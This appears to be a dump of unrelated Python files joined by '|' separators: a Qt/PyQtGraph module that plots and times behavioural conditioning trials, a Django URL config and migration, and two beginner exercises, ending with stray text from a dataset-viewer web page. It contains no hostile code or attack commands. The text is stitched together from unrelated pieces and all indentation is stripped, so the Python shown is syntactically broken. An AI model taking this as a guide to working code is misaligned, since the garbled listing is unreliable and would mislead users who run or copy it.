def resetTrialGraph(pauseOnReset = True):
global playing, graphInitialized, duringITI, done
#Reset variables
if pauseOnReset:
setPlaying(False)
graphInitialized = False
done = False
#Stop timers
displayTimer.stop()
itiTimer.stop()
#In case this was called during ITI, stop ITI
duringITI = False
#Clear the graph
graphWindow.clear()
graphWindow.addLabel(text = "No Session Loaded",
size = "18pt", color = textColor)
#Creates the trial graph (bar graph creation in separate function)
#Optional parameter used for regenerating graph after editing display settings
#without editing the status of the graph
def createTrialGraph(editStatus = True):
#Variables that persist outside this function call
global iteration, curve, trialGraph, dataSize, data, graphInitialized, done, previousITI
#Start with clean slate before we do anything
graphWindow.clear()
#Set background color
graphWindow.setBackground(backgroundColor)
if editStatus:
#Update the session info label in the main window to reflect trial number
im.updateSessionInfoLabel()
#Create data array (this array will be displayed as the line on the graph)
dataSize = ts.currentSession.trialLengthInSamples #Array size
data = np.full(shape = dataSize, fill_value = -5, dtype = np.float32) #initialized to -5 (so they're off-screen)
#Create empty graph
trialGraph = graphWindow.addPlot()
#Plot line in graph
if dsm.shading:
curve = trialGraph.plot(y = data, fillLevel = -0.3, brush = dataColor)
else:
curve = trialGraph.plot(y = data, fillLevel = -0.3, pen = dataColor)
#Add graph labels
trialGraph.setLabel('bottom', "<span style = \"color: " + htmlColorString(textColor) + "; font-size:18px\">Time (ms)</span>")
trialGraph.setLabel('left', "<span style = \"color: " + htmlColorString(textColor) + "; font-size:18px\">Response Amplitude (VDC)</span>")
#Axis line/tick color
trialGraph.getAxis('bottom').setPen(axisColor)
trialGraph.getAxis('left').setPen(axisColor)
#Axis limits on graph
trialGraph.setLimits(xMin = 0, xMax = dataSize, yMin = 0, yMax = 5, minXRange = 10, minYRange = 5)
#Scale x axis ticks to measure milliseconds instead of samples
trialGraph.getAxis('bottom').setScale(ts.currentSession.sampleInterval)
#Removes default "A" button on bottom left corner used for resetting the zoom on the graph
trialGraph.hideButtons()
#Disables the context menu you see when right-clicking on the graph
trialGraph.setMenuEnabled(False)
#Determine what stimuli (CS and/or US) the trial has
if ts.currentSession.paradigm == ts.Paradigm.PSEUDO:
hasCS = ts.currentSession.pseudoTrialOrdering[ts.currentSession.currentTrial - 1]
hasUS = not hasCS
else:
hasCS = True
hasUS = ts.currentSession.usStartInSamples >= 0
#Create CS lines and shaded area between lines
if hasCS:
csStart = ts.currentSession.csStartInSamples
csEnd = ts.currentSession.csEndInSamples
csRegion = pg.LinearRegionItem(values = [csStart, csEnd], brush = stimulusColor, movable = False)
csRegion.lines[0].setPen(stimulusColor)
csRegion.lines[1].setPen(stimulusColor)
trialGraph.addItem(csRegion)
#Same for US
if hasUS:
usStart = ts.currentSession.usStartInSamples
usEnd = ts.currentSession.usEndInSamples
usRegion = pg.LinearRegionItem(values = [usStart, usEnd], brush = stimulusColor, movable = False)
usRegion.lines[0].setPen(stimulusColor)
usRegion.lines[1].setPen(stimulusColor)
trialGraph.addItem(usRegion)
#Add CS and US text labels
stimulusTicks = []
if hasCS:
stimulusTicks.append(((csStart + csEnd) / 2, "CS"))
if hasUS:
stimulusTicks.append(((usStart + usEnd) / 2, "US"))
trialGraph.getAxis('top').setTicks([stimulusTicks])
trialGraph.getAxis('top').setTickFont(im.popUpFont)
trialGraph.getAxis('top').setHeight(-5)
trialGraph.showAxis('top', True)
trialGraph.getAxis('top').setPen(axisColor)
#Launch graph based on play mode
if im.playMode == im.PlayMode.PLAYBACK:
#Update graph with array of samples for trial
data = JSONConverter.openTrial()
curve.setData(data)
#Render onset arrows
onsets = JSONConverter.getOnsets()
for x in range(len(onsets)):
addArrow(onsets[x] - 1)
#Render offset arrows
if(dsm.renderOffset):
offsets = JSONConverter.getOffsets()
for x in range(len(offsets)):
addArrow(offsets[x] - 1, False)
#Data Acquisition
else:
if editStatus:
#Regularly sample data (according to sample rate defined in session settings)
iteration = 0
if ts.currentSession.currentTrial == 1:
tco.orderToStartSession()
previousITI = 0 #First trial's previous ITI is 0
#Regularly update display (according to display rate defined in display settings)
displayTimer.start(1000 / dsm.displayRate)
else:
displayTimer.setInterval(1000 / dsm.displayRate)
#Done initializing/creating/launching the graph
if editStatus:
done = False #As in done with session, which we are not (we are just starting the session!!!)
graphInitialized = True
#Updates the display
def displayUpdate():
#Variables that need to be survive across multiple calls to update function
global iteration, dataSize, curve, data, playing
#Trial can be paused
if not playing:
return
#Read in new samples
#If ITI = 0, then there might be samples in the queue for the next trial already...
#so make sure we don't go past our limit for this trial
while (not tco.sampleQueue.empty()) and iteration < dataSize:
data[iteration] = tco.sampleQueue.get(block = False)
iteration += 1
#Update trial graph
curve.setData(data)
#End of trial?
if iteration >= dataSize:
endTrialStartITI()
#Create timer to regularly call displayUpdate (timer started in createTrialGraph function)
displayTimer = QtCore.QTimer()
displayTimer.timeout.connect(displayUpdate)
#Updates the reading on the real-time voltage bar
def voltageBarUpdate():
#Main question: Where to get reading from?
#During running data acquisition trial: USE DATA[ITERATION - 1]
if im.playMode == im.PlayMode.ACQUISITION and graphInitialized and (not duringITI) and playing:
lastSample = iteration - 1
#Update bar graph
if lastSample != -1 and lastSample < dataSize:
barHeights[0] = data[lastSample]
bars.setOpts(height = barHeights)
#All other times: USE AUX SAMPLE QUEUE
else:
#Get latest sample
newSampleValue = -1
while not tco.auxSampleQueue.empty():
newSampleValue = tco.auxSampleQueue.get(block = False)
#Update bar graph
if newSampleValue != -1:
barHeights[0] = newSampleValue
bars.setOpts(height = barHeights)
#Create timer to regularly call voltageBarUpdate
voltageBarTimer = QtCore.QTimer()
voltageBarTimer.timeout.connect(voltageBarUpdate)
def endTrialStartITI():
global previousITI, duringITI, itiCountdown, countdownLabel, done
#End trial
displayTimer.stop()
#Save trial
JSONConverter.saveTrial(data, float(previousITI))
#Don't start ITI because that was the last trial we just finished
if ts.currentSession.currentTrial >= ts.currentSession.trialCount:
done = True
#Pause upon completion
im.setPlaying(False)
#Completion message...
mainWindow.trialInfoLabel.setText("SESSION COMPLETE!\n\nPRESS STOP TO SAVE")
#Also, don't allow restart of data acquisition (functionality not supported)
mainWindow.playButton.setEnabled(False)
#Return before ITI starts
return
#Create countdown label "Next trial in..."
mainWindow.trialInfoLabel.setText("NEXT TRIAL IN...\n\n")
#Wait for start of ITI updates (if it takes TCO more than 3 seconds then raise hell!)
itiCountdown = tco.itiQueue.get(timeout = 3)
previousITI = itiCountdown
if itiCountdown > 0:
#Create countdown label "Next trial in... X.X"
mainWindow.trialInfoLabel.setText("NEXT TRIAL IN...\n\n{:5.1f}".format(itiCountdown))
#Begin ITI
duringITI = True
itiTimer.start(100) #Parameter is millisecond interval between updates
else:
endITIStartTrial()
#Update the iti for the countdown
def itiUpdate():
global itiCountdown
#ITI can be paused
if not playing:
return
#Update how long ITI has been going (countdown is in seconds)
#Each item in the ITI queue was the latest countdown value at the time it was sent,
#so just empty out queue and set countdown to latest push
while not tco.itiQueue.empty():
itiCountdown = tco.itiQueue.get(block = False)
#The exception is when ITI is 0, stop taking from queue b/c next samples are...
#for next ITI
if itiCountdown == 0:
break
#Display updated countdown (format countdown from int to string with 1 decimal point precision)
mainWindow.trialInfoLabel.setText("NEXT TRIAL IN...\n\n{:5.1f}".format(itiCountdown))
#Determine if ITI is over
if itiCountdown <= 0:
endITIStartTrial()
#Create timer to run ITI (start is called on the timer in startITI function above)
itiTimer = QtCore.QTimer()
itiTimer.timeout.connect(itiUpdate)
itiTimer.setTimerType(QtCore.Qt.PreciseTimer)
#Stop the ITI and begin the next trial
def endITIStartTrial():
#Stop ITI (does the following: clears previous trial graph, duringITI = False, itiTimer.stop())
resetTrialGraph(pauseOnReset = False)
#Update trial info label
mainWindow.trialInfoLabel.setText("RUNNING TRIAL")
#Increment trial count
ts.currentSession.currentTrial += 1
#Begin new trial
createTrialGraph()
#Adds arrow on top of data at xPosition (in samples) on graph
def addArrow(xPositionInSamples, onset=True):
if(onset):
arrowColor = dsm.colors[dsm.ColorAttribute.ONSET.value]
else:
arrowColor = dsm.colors[dsm.ColorAttribute.OFFSET.value]
#Create arrow with style options
#Make sure to specify rotation in constructor, b/c there's a bug in PyQtGraph (or PyQt) where you can't update the rotation of the arrow after creation
#See (http://www.pyqtgraph.org/documentation/graphicsItems/arrowitem.html) for options
arrow = pg.ArrowItem(angle = -90, headLen = 25, headWidth = 25, brush = arrowColor)
#Set arrow's x and y positions respectively
arrow.setPos(xPositionInSamples, data[xPositionInSamples])
#Finally, add arrow to graph
trialGraph.addItem(arrow)
|
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^$', views.index),
url(r'^ninjas$', views.turtles),
url(r'^ninjas/(?P<color>\S+)$', views.ninjacolor)
]
|
# Generated by Django 3.1.4 on 2020-12-18 08:54
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('article', '0003_comment'),
]
operations = [
migrations.CreateModel(
name='paket',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('ucrt', models.CharField(max_length=5, verbose_name='Ücret')),
('ucrt_title', models.CharField(max_length=5, verbose_name='Title')),
],
),
]
|
s,n=input().split()
n=int(n)
for i in range(0,len(s)):
print(s[i:n],end=" ")
if(n<len(s)):
n=n+1
else:
break
|
shoppinglist = ['Milk','Cheese','butter']
print(shoppinglist)
# in operator
print('Milk' in shoppinglist)
# loop
for i in range(len(shoppinglist)):
shoppinglist[i] = shoppinglist[i]
print(shoppinglist[i])
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.